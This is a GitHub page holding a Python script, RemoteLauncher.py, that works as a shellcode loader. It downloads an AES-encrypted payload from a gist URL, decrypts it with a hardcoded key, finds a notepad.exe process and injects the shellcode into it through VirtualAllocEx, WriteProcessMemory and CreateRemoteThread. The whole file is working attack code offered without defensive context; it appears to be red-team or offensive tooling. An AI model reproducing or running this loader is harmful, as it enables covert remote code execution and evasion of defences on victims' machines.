MiscellaneousCode/RemoteLauncher.py at master · StudyCat404/MiscellaneousCode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
import ctypes
import ctypes.wintypes
import urllib.request
from Crypto.Cipher import AES
from base64 import b64decode
from psutil import process_iter
from os import getlogin

hash_randomizer = '56797768723989728776752398'

def aes_decrypt(ciphertext, key, iv):
    cipher = AES.new(key, AES.MODE_CFB, iv)
    plaintext = cipher.decrypt(ciphertext)
    return plaintext

def main():
    key = b'eax94il288nyq0rv'

    page = urllib.request.urlopen("https://gist.githubusercontent.com/m1kemu/e14d7e8ddc0257d083d2f8de2905df36/raw/45a463bf5eedd75b648d9082b867f7b9f9eb7d69/download_me.txt")
    message = page.read()
    message = message.decode()

    ciphertext_b64 = message.split(':')[0]
    iv_b64 = message.split(':')[1]

    ciphertext = b64decode(ciphertext_b64)
    iv = b64decode(iv_b64)

    shellcode = aes_decrypt(ciphertext, key, iv)

    CloseHandle = ctypes.windll.kernel32.CloseHandle
    CloseHandle.argtypes = [ctypes.wintypes.HANDLE]
    CloseHandle.restype = ctypes.wintypes.BOOL

    CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread
    CreateRemoteThread.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.LPVOID, ctypes.c_size_t, ctypes.wintypes.LPVOID, ctypes.wintypes.LPVOID, ctypes.wintypes.DWORD, ctypes.wintypes.LPVOID]
    CreateRemoteThread.restype = ctypes.wintypes.HANDLE

    OpenProcess = ctypes.windll.kernel32.OpenProcess
    OpenProcess.argtypes = [ctypes.wintypes.DWORD, ctypes.wintypes.BOOL, ctypes.wintypes.DWORD]
    OpenProcess.restype = ctypes.wintypes.HANDLE

    VirtualAllocEx = ctypes.windll.kernel32.VirtualAllocEx
    VirtualAllocEx.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.LPVOID, ctypes.c_size_t, ctypes.wintypes.DWORD, ctypes.wintypes.DWORD]
    VirtualAllocEx.restype = ctypes.wintypes.LPVOID

    VirtualFreeEx = ctypes.windll.kernel32.VirtualFreeEx
    VirtualFreeEx.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.LPVOID, ctypes.c_size_t, ctypes.wintypes.DWORD]
    VirtualFreeEx.restype = ctypes.wintypes.BOOL

    VirtualProtectEx = ctypes.windll.kernel32.VirtualProtectEx
    VirtualProtectEx.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.LPVOID, ctypes.c_size_t, ctypes.wintypes.DWORD, ctypes.wintypes.LPVOID]
    VirtualProtectEx.restype = ctypes.wintypes.BOOL

    WriteProcessMemory = ctypes.windll.kernel32.WriteProcessMemory
    WriteProcessMemory.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.LPVOID, ctypes.wintypes.LPCVOID, ctypes.c_size_t, ctypes.wintypes.LPVOID]
    WriteProcessMemory.restype = ctypes.wintypes.BOOL

    my_username = getlogin()
    proc_to_find = 'notepad.exe'
    my_pid = None

    for proc in process_iter():
        try:
            pinfo = proc.as_dict(attrs=['pid', 'name', 'username'])
        except psutil.NoSuchProcess:
            pass
        else:
            if pinfo['username']:
                ps_username = (pinfo['username']).split('\\')[1]
                pid = pinfo['pid']
                name = pinfo['name']

                if ps_username == my_username and name == proc_to_find:
                    my_pid = pid
                    print(f'{my_username}:{ps_username}:{pid}:{name}')

                    break

    handle = OpenProcess(0x0028, False, my_pid)
    memptr = VirtualAllocEx(handle, 0, len(shellcode), 0x1000, 0x40)
    result = WriteProcessMemory(handle, memptr, shellcode, len(shellcode), 0)
    result = VirtualProtectEx(handle, memptr, len(shellcode), 0x20, 0)
    thread = CreateRemoteThread(handle, 0, 0, memptr, 0, 0, 0)
    VirtualFreeEx(handle, memptr, 0, 0xC000)
    CloseHandle(handle)


if __name__ == '__main__':
    main()